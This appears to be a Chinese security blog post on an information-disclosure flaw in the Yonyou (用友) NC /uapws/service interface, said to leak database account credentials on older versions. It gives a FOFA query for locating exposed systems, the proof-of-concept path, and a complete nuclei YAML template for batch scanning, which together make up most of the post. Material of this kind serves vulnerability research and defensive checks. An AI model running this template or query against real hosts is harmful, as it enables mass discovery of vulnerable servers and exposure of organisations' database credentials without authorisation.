用友NC service接口信息泄露漏洞

漏洞描述

用友nc有个接口可以获取数据库账户密码,不过是老版本了

漏洞复现

fofa语法:app="用友-UFIDA-NC"
POC:/uapws/service

nuclei批量yaml文件

id: yonyou_NC-uapws-server-api

info:
  name: yonyou_NC-uapws-server-api
  author: nigori
  severity: high
  description: fofa app="用友-UFIDA-NC"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: yonyou,nc,oa,bjxsec

requests:
  - method: GET
    path:
      - "{{BaseURL}}/uapws/service"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{http://"
          - "<html><body><p> <a"
          - "</a> </p></body></html"
        part: body
        condition: and

      - type: status
        status:
          - 200
posted @   学安全的小白  阅读(1040)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示